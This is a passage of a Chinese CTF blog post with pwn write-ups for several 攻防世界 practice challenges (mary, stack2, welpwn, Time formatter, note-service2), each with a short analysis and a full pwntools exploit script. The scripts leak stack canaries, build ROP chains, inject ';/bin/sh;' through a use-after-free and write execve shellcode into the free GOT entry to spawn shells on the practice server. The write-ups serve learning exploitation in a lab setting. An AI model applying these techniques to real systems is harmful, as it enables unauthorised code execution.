+0000000000000008  r              db 8 dup(?)</code></pre><p>canary与我们输入参数的偏移为0x90 - 8 = 0x88，然后八个字节为一组，0x88 / 8 = 17，17 + 6 = 23</p>
<h2 id="攻击"><a href="#攻击" class="headerlink" title="攻击"></a>攻击</h2><pre class=" language-python"><code class="language-python"><span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span>
p <span class="token operator">=</span> process<span class="token punctuation">(</span><span class="token string">'./mary'</span><span class="token punctuation">)</span>
<span class="token comment" spellcheck="true">#p = remote('111.198.29.45',34747)</span>
p<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">'3. Exit the battle '</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string">'2'</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string">'%23$p'</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">'0x'</span><span class="token punctuation">)</span>
canary <span class="token operator">=</span> int<span class="token punctuation">(</span>p<span class="token punctuation">.</span>recv<span class="token punctuation">(</span><span class="token number">16</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">16</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">'3. Exit the battle '</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string">'1'</span><span class="token punctuation">)</span>
payload <span class="token operator">=</span> <span class="token number">0x88</span><span class="token operator">*</span><span class="token string">'a'</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span>canary<span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">'a'</span><span class="token operator">*</span><span class="token number">0x8</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span><span class="token number">0x4008da</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>payload<span class="token punctuation">)</span>
p<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span></code></pre>
<h1 id="stack2"><a href="#stack2" class="headerlink" title="stack2"></a>stack2</h1><p><code>change number</code>没有对边界进行检查，可以实现数组越界读写，并且有后门函数，所以直接将<code>EIP</code>覆盖为后门函数的地址。需要<strong>注意</strong>：</p>
<ul>
<li><code>EIP</code>和<code>v13</code>之间的偏移并不是<code>0x70+4</code>，需要用gdb自己调试，结果是<code>0x84</code></li>
<li>远程连接后并没有<code>/bin/bash</code>指令，所以我们手动构造<code>system(&#39;sh&#39;)</code></li>
</ul>
<p>在<code>main</code>函数开始和<code>retn</code>分别下断点，得到一开始<code>EBP</code>的值为<code>0xffffcef8</code>，运行到<code>retn</code>栈顶的地址为<code>0xffffcf0c</code>，所以偏移为<code>0xffffcf0c-(0xffffcef8-0x70)=0x84</code>。</p>
<pre class=" language-python"><code class="language-python"><span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span>
<span class="token comment" spellcheck="true"># context.log_level = 'debug'</span>

process_name <span class="token operator">=</span> <span class="token string">'./s2'</span>
<span class="token comment" spellcheck="true">#p = process(process_name)</span>
p <span class="token operator">=</span> remote<span class="token punctuation">(</span><span class="token string">'111.198.29.45'</span><span class="token punctuation">,</span><span class="token string">'38958'</span><span class="token punctuation">)</span>

hackhere <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token number">0x9b</span><span class="token punctuation">,</span> <span class="token number">0x85</span><span class="token punctuation">,</span> <span class="token number">0x04</span><span class="token punctuation">,</span> <span class="token number">0x08</span><span class="token punctuation">]</span>  <span class="token comment" spellcheck="true">#0x0804859B</span>
system <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token number">0x50</span><span class="token punctuation">,</span> <span class="token number">0x84</span><span class="token punctuation">,</span> <span class="token number">0x04</span><span class="token punctuation">,</span> <span class="token number">0x08</span><span class="token punctuation">]</span>    <span class="token comment" spellcheck="true">#0x8048450</span>
sh_addr <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token number">0x87</span><span class="token punctuation">,</span> <span class="token number">0x89</span><span class="token punctuation">,</span> <span class="token number">0x04</span><span class="token punctuation">,</span> <span class="token number">0x08</span><span class="token punctuation">]</span>    <span class="token comment" spellcheck="true">#0x8048987</span>
write_offset <span class="token operator">=</span> <span class="token number">0x84</span>

<span class="token keyword">def</span> <span class="token function">change_number</span><span class="token punctuation">(</span>offset<span class="token punctuation">,</span> value<span class="token punctuation">)</span><span class="token punctuation">:</span>
    p<span class="token punctuation">.</span>sendlineafter<span class="token punctuation">(</span><span class="token string">'5. exit'</span><span class="token punctuation">,</span> <span class="token string">'3'</span><span class="token punctuation">)</span>
    p<span class="token punctuation">.</span>sendlineafter<span class="token punctuation">(</span><span class="token string">'which number to change:'</span><span class="token punctuation">,</span> str<span class="token punctuation">(</span>offset<span class="token punctuation">)</span><span class="token punctuation">)</span>
    p<span class="token punctuation">.</span>sendlineafter<span class="token punctuation">(</span><span class="token string">'new number:'</span><span class="token punctuation">,</span> str<span class="token punctuation">(</span>value<span class="token punctuation">)</span><span class="token punctuation">)</span>

p<span class="token punctuation">.</span>sendlineafter<span class="token punctuation">(</span><span class="token string">'How many numbers you have:'</span><span class="token punctuation">,</span> <span class="token string">'1'</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span>sendlineafter<span class="token punctuation">(</span><span class="token string">'Give me your numbers'</span><span class="token punctuation">,</span> <span class="token string">'1'</span><span class="token punctuation">)</span>

<span class="token keyword">for</span> i <span class="token keyword">in</span> range<span class="token punctuation">(</span><span class="token number">4</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    change_number<span class="token punctuation">(</span>write_offset<span class="token operator">+</span>i<span class="token punctuation">,</span> system<span class="token punctuation">[</span>i<span class="token punctuation">]</span><span class="token punctuation">)</span>

write_offset<span class="token operator">+=</span> <span class="token number">0x8</span>
<span class="token keyword">for</span> i <span class="token keyword">in</span> range<span class="token punctuation">(</span><span class="token number">4</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    change_number<span class="token punctuation">(</span>write_offset<span class="token operator">+</span>i<span class="token punctuation">,</span> sh_addr<span class="token punctuation">[</span>i<span class="token punctuation">]</span><span class="token punctuation">)</span>

p<span class="token punctuation">.</span>sendlineafter<span class="token punctuation">(</span><span class="token string">'5. exit'</span><span class="token punctuation">,</span> <span class="token string">'5'</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span>
</code></pre>
<h1 id="welpwn"><a href="#welpwn" class="headerlink" title="welpwn"></a>welpwn</h1><h2 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h2><p>该程序buf会复制到s2，由s2可实现栈溢出，但复制过程中遇到<code>\x00</code>会截断，这是64位程序，地址一般都是有<code>\x00</code>的，也就是说payload只能覆盖到eip，后续地址会被截断，但<strong>payload是完整保存在buf中的</strong>。</p>
<p>我们调试一下，发现buf和s2是<strong>物理相邻</strong>的（输入’a’x12+’b’x12+’cccc’）：</p>
<div align="center"><img width="500" src="https://i.loli.net/2020/02/08/IAHJQkjthPfp8gw.png"></div>
我们可以把eip覆盖为`0x000000000040089c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret`。这样会从栈中pop出0x20个字节，跳过buf的开头，继续执行后续的代码：

<div align="center"><img width="300" src="https://i.loli.net/2020/02/08/FfT3lhC5N2bksLm.png"></div>
## EXP

<pre class=" language-python"><code class="language-python"><span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span>
<span class="token keyword">from</span> LibcSearcher <span class="token keyword">import</span> <span class="token operator">*</span>
<span class="token comment" spellcheck="true">#context.log_level = 'debug'</span>
<span class="token comment" spellcheck="true">#p = process('./welpwn')</span>
p <span class="token operator">=</span> remote<span class="token punctuation">(</span><span class="token string">'111.198.29.45'</span><span class="token punctuation">,</span><span class="token string">'33147'</span><span class="token punctuation">)</span>
elf <span class="token operator">=</span> ELF<span class="token punctuation">(</span><span class="token string">'./welpwn'</span><span class="token punctuation">)</span>
<span class="token comment" spellcheck="true">#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')</span>

pop_rdi <span class="token operator">=</span> <span class="token number">0x00000000004008a3</span>
pop4 <span class="token operator">=</span> <span class="token number">0x000000000040089c</span>

payload <span class="token operator">=</span> <span class="token string">'a'</span><span class="token operator">*</span><span class="token number">0x18</span>
payload<span class="token operator">+=</span> p64<span class="token punctuation">(</span>pop4<span class="token punctuation">)</span>
payload<span class="token operator">+=</span> p64<span class="token punctuation">(</span>pop_rdi<span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span>elf<span class="token punctuation">.</span>got<span class="token punctuation">[</span><span class="token string">'write'</span><span class="token punctuation">]</span><span class="token punctuation">)</span>
payload<span class="token operator">+=</span> p64<span class="token punctuation">(</span>elf<span class="token punctuation">.</span>plt<span class="token punctuation">[</span><span class="token string">'puts'</span><span class="token punctuation">]</span><span class="token punctuation">)</span>
payload<span class="token operator">+=</span> p64<span class="token punctuation">(</span><span class="token number">0x4007CD</span><span class="token punctuation">)</span>

p<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">'RCTF'</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span>send<span class="token punctuation">(</span>payload<span class="token punctuation">)</span>

write_addr <span class="token operator">=</span> u64<span class="token punctuation">(</span>p<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">'\x7f'</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token operator">-</span><span class="token number">6</span><span class="token punctuation">:</span><span class="token punctuation">]</span><span class="token operator">+</span><span class="token string">'\x00'</span><span class="token operator">+</span><span class="token string">'\x00'</span><span class="token punctuation">)</span>
libc <span class="token operator">=</span> LibcSearcher<span class="token punctuation">(</span><span class="token string">'write'</span><span class="token punctuation">,</span>write_addr<span class="token punctuation">)</span>
libc_base <span class="token operator">=</span> write_addr <span class="token operator">-</span> libc<span class="token punctuation">.</span>dump<span class="token punctuation">(</span><span class="token string">'write'</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span>info<span class="token punctuation">(</span><span class="token string">'libc_base: '</span><span class="token operator">+</span>hex<span class="token punctuation">(</span>libc_base<span class="token punctuation">)</span><span class="token punctuation">)</span>
system <span class="token operator">=</span> libc_base <span class="token operator">+</span> libc<span class="token punctuation">.</span>dump<span class="token punctuation">(</span><span class="token string">'system'</span><span class="token punctuation">)</span>
bin_sh <span class="token operator">=</span> libc_base <span class="token operator">+</span> libc<span class="token punctuation">.</span>dump<span class="token punctuation">(</span><span class="token string">'str_bin_sh'</span><span class="token punctuation">)</span>

payload <span class="token operator">=</span> <span class="token string">'a'</span><span class="token operator">*</span><span class="token number">0x18</span>
payload<span class="token operator">+=</span> p64<span class="token punctuation">(</span>pop4<span class="token punctuation">)</span>
payload<span class="token operator">+=</span> p64<span class="token punctuation">(</span>pop_rdi<span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span>bin_sh<span class="token punctuation">)</span>
payload<span class="token operator">+=</span> p64<span class="token punctuation">(</span>system<span class="token punctuation">)</span>

p<span class="token punctuation">.</span>send<span class="token punctuation">(</span>payload<span class="token punctuation">)</span>

p<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span></code></pre>
<h1 id="Time-formatter"><a href="#Time-formatter" class="headerlink" title="Time formatter"></a>Time formatter</h1><p>输入<code>/bin/date -d @1 +&#39;&#39;;/bin/sh;&#39;&#39;</code>会 get shell，也就是说我们要让 <strong>ptr</strong> 变成<code>&#39;;/bin/sh;&#39;</code>。<strong>ptr *<em>是我们输入的 time format，但由于有格式限制，我们不能输入<code>;</code>和<code>&#39;</code>。我们发现 *</em>ptr</strong> 和 <strong>value</strong> 指向的是存储着我们输入的  time_format 和 time_zone 字符串的堆（可以康康strdup函数），并且 exit 功能里面会 free 这两个堆块，但没有置为NULL，存在UAF漏洞。</p>
<p>所以思路是先输入符合要求的 time_format ，之后用 exit 功能 free 掉 <strong>ptr</strong> 但不退出。之后输入 time_zone 的时候会申请前面 <strong>ptr</strong> 的堆块，这样 <strong>value</strong> 和 <strong>ptr</strong> 指向的是相同的堆块，就可以向 <strong>ptr</strong> 写入<code>&#39;;/bin/sh;&#39;</code>。</p>
<pre class=" language-python"><code class="language-python"><span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span>

p <span class="token operator">=</span> process<span class="token punctuation">(</span><span class="token string">'./time_formatter'</span><span class="token punctuation">)</span>
<span class="token comment" spellcheck="true">#p = remote('111.198.29.45','44913')</span>

p<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">'> '</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string">'1'</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">'Format: '</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string">'a'</span><span class="token operator">*</span><span class="token number">11</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">'> '</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string">'5'</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string">'N'</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">'> '</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string">'3'</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">'zone: '</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string">'\';/bin/sh;\''</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">'> '</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string">'4'</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span>
</code></pre>
<h1 id="note-service2"><a href="#note-service2" class="headerlink" title="note-service2"></a>note-service2</h1><p>程序只有两个功能：add 和 delete 。其中 add 函数中最大只能申请 malloc(8)，得到 0x20 的 chunk；delete 函数中存在 UAF。我一开始只看到这一个漏洞，发现无法利用，看完 wp 涨了一波姿势。还有个漏洞是 add 函数中输入 index 的时候没有限制，所以我们可以任意地址写，然后程序本身没有开 NX 保护，意味着我们可以写 shellcode。但每次只能写 7 字节的 shellcode，于是可以申请多个堆，每个堆写完执行 jmp short xx，跳到下一个指令中。xx是jmp short 到下一个指令地址的偏移 1+8+8+8 = 0x19。</p>
<p>所以思路是先申请一个堆块写入 /bin/sh，再把 shellcode 写入 free_got 中 ，最后释放含有 /bin/sh 的堆块。</p>
<h2 id="shellcode"><a href="#shellcode" class="headerlink" title="shellcode"></a>shellcode</h2><p>相当于执行 <code>execve(&quot;/bin/sh&quot;,0,0)</code>，传参的时候会把第一个参数传个 rdx，也就是堆块里的 /bin/sh 。</p>
<pre class=" language-nasm"><code class="language-nasm">xor <span class="token register variable">rsi</span>,<span class="token register variable">rsi</span><span class="token comment" spellcheck="true">;</span>
mov <span class="token register variable">rax</span>,<span class="token number">0x3b</span><span class="token comment" spellcheck="true">;</span>
xor <span class="token register variable">rdx</span>,<span class="token register variable">rdx</span><span class="token comment" spellcheck="true">;</span>
syscall<span class="token comment" spellcheck="true">;</span></code></pre>
<h2 id="EXP-2"><a href="#EXP-2" class="headerlink" title="EXP"></a>EXP</h2><pre class=" language-python"><code class="language-python"><span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span>
context<span class="token punctuation">(</span>arch <span class="token operator">=</span> <span class="token string">'amd64'</span><span class="token punctuation">,</span>os<span class="token operator">=</span><span class="token string">'linux'</span><span class="token punctuation">)</span>
<span class="token comment" spellcheck="true">#p = process('./note')</span>
p <span class="token operator">=</span> remote<span class="token punctuation">(</span><span class="token string">'111.198.29.45'</span><span class="token punctuation">,</span><span class="token string">'37156'</span><span class="token punctuation">)</span>
elf <span class="token operator">=</span> ELF<span class="token punctuation">(</span><span class="token string">'./note'</span><span class="token punctuation">)</span>
libc <span class="token operator">=</span> ELF<span class="token punctuation">(</span><span class="token string">'/lib/x86_64-linux-gnu/libc.so.6'</span><span class="token punctuation">)</span>

<span class="token keyword">def</span> <span class="token function">cmd</span><span class="token punctuation">(</span>ch<span class="token punctuation">)</span><span class="token punctuation">:</span>
    p<span class="token punctuation">.</span>sendlineafter<span class="token punctuation">(</span><span class="token string">'>> '</span><span class="token punctuation">,</span>str<span class="token punctuation">(</span>ch<span class="token punctuation">)</span><span class="token punctuation">)</span>

<span class="token keyword">def</span> <span class="token function">add</span><span class="token punctuation">(</span>idx<span class="token punctuation">,</span>size<span class="token punctuation">,</span>con<span class="token punctuation">)</span><span class="token punctuation">:</span>
    cmd<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span>
    p<span class="token punctuation">.</span>sendlineafter<span class="token punctuation">(</span><span class="token string">'index:'</span><span class="token punctuation">,</span>str<span class="token punctuation">(</span>idx<span class="token punctuation">)</span><span class="token punctuation">)</span>
    p<span class="token punctuation">.</span>sendlineafter<span class="token punctuation">(</span><span class="token string">'size:'</span><span class="token punctuation">,</span>str<span class="token punctuation">(</span>size<span class="token punctuation">)</span><span class="token punctuation">)</span>
    p<span class="token punctuation">.</span>sendafter<span class="token punctuation">(</span><span class="token string">'content:'</span><span class="token punctuation">,</span>con<span class="token punctuation">)</span>

<span class="token keyword">def</span> <span class="token function">delete</span><span class="token punctuation">(</span>idx<span class="token punctuation">)</span><span class="token punctuation">:</span>
    cmd<span class="token punctuation">(</span><span class="token number">4</span><span class="token punctuation">)</span>
    p<span class="token punctuation">.</span>sendlineafter<span class="token punctuation">(</span><span class="token string">'index:'</span><span class="token punctuation">,</span>str<span class="token punctuation">(</span>idx<span class="token punctuation">)</span><span class="token punctuation">)</span>

<span class="token keyword">def</span> <span class="token function">exp</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    idx<span class="token operator">=</span><span class="token punctuation">(</span>elf<span class="token punctuation">.</span>got<span class="token punctuation">[</span><span class="token string">'free'</span><span class="token punctuation">]</span><span class="token operator">-</span><span class="token number">0x2020A0</span><span class="token punctuation">)</span><span class="token operator">/</span><span class="token number">8</span>
    add<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">,</span><span class="token number">8</span><span class="token punctuation">,</span><span class="token string">'/bin/sh'</span><span class="token punctuation">)</span>
    add<span class="token punctuation">(</span>idx<span class="token punctuation">,</span><span class="token number">8</span><span class="token punctuation">,</span><span class="token string">'\x48\x31\xf6\x90\x90\xeb\x19'</span><span class="token punctuation">)</span>
    add<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">,</span><span class="token number">8</span><span class="token punctuation">,</span><span class="token string">'\xb8\x3b\x00\x00\x00\xeb\x19'</span><span class="token punctuation">)</span>
    add<span class="token punctuation">(</span><span class="token number">2</span><span class="token punctuation">,</span><span class="token number">8</span><span class="token punctuation">,</span><span class="token string">'\x48\x31\xd2\x90\x90\xeb\x19'</span><span class="token punctuation">)</span>
    add<span class="token punctuation">(</span><span class="token number">3</span><span class="token punctuation">,</span><span class="token number">8</span><span class="token punctuation">,</span><span class="token string">'\x0f\x05\x90\x90\x90\x90\x90'</span><span class="token punctuation">)</span>
    delete<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span>


<span class="token keyword">if</span> __name__ <span class="token operator">==</span> <span class="token string">'__main__'</span><span class="token punctuation">:</span>
    exp<span class="token punctuation">(</span><span class="token punctuation">)</span>
    p<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span></code></pre>

            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">Apr1L</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://suvii22.github.io/2019/10/08/攻防世界/">http://suvii22.github.io/2019/10/08/攻防世界/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">Apr1L</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/pwn/">
                                    <span class="chip bg-color">pwn</span>
                                </a>
                            
                                <a href="/tags/canary/">
                                    <span class="chip bg-color">canary</span>
                                </a>
                            
                                <a href="/tags/栈溢出/">
                                    <span class="chip bg-color">栈溢出</span>
                                </a>
                            
                                <a href="/tags/ROP/">
                                    <span class="chip bg-color">ROP</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
        </div>
    </div>

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2019/10/27/wiki/">
                    <div class="card-image">
                        
                        <img src="http://www.005.tv/uploads/allimg/200313/66-200313151120B6.jpg" class="responsive-img" alt="wiki">
                        
                        <span class="card-title">wiki</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            学习
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2019-10-27
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/pwn/" class="post-category">
                                    pwn
                                </a>
                            
                            <a href="/categories/pwn/wp/" class="post-category">
                                    wp
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/pwn/">
                        <span class="chip bg-color">pwn</span>
                    </a>
                    
                    <a href="/tags/堆溢出/">
                        <span class="chip bg-color">堆溢出</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                本篇&nbsp;<i class="far fa-dot-circle"></i>
            </div>
            <div class="card">
                <a href="/2019/10/08/攻防世界/">
                    <div class="card-image">
                        
                        <img src="http://www.005.tv/uploads/allimg/190705/66-1ZF5145U3G7.jpg" class="responsive-img" alt="攻防世界">
                        
                        <span class="card-title">攻防世界</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            受虐
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2019-10-08
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/pwn/" class="post-category">
                                    pwn
                                </a>
                            
                            <a href="/categories/pwn/wp/" class="post-category">
                                    wp
                                </a>
                            
                            
                        </span>
                    </div>
                </div>

                
                <div class="card-action article-tags">
                    
                    <a href="/tags/pwn/">
                        <span class="chip bg-color">pwn</span>
                    </a>
                    
                    <a href="/tags/canary/">
                        <span class="chip bg-color">canary</span>
                    </a>
                    
                    <a href="/tags/栈溢出/">
                        <span class="chip bg-color">栈溢出</span>
                    </a>
                    
                    <a href="/tags/ROP/">
                        <span class="chip bg-color">ROP</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


<!-- 代码块折行 -->

<style type="text/css">
code[class*="language-"], pre[class*="language-"] { white-space: pre !important; }
</style>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h1, h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h1, h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
    <div class="container row center-align" style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            <span id="year">2019</span>
            <a href="/about" target="_blank">Apr1L</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            
            
            
            <span id="busuanzi_container_site_pv">
                |&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;<span id="busuanzi_value_site_pv"
                    class="white-color"></span>&nbsp;次
            </span>
            
            
            <span id="busuanzi_container_site_uv">
                |&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;<span id="busuanzi_value_site_uv"
                    class="white-color"></span>&nbsp;人
            </span>
            
            <br>
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link ">
    <a href="https://github.com/blinkfox" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:1398709990@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=1398709990" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 1398709990" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


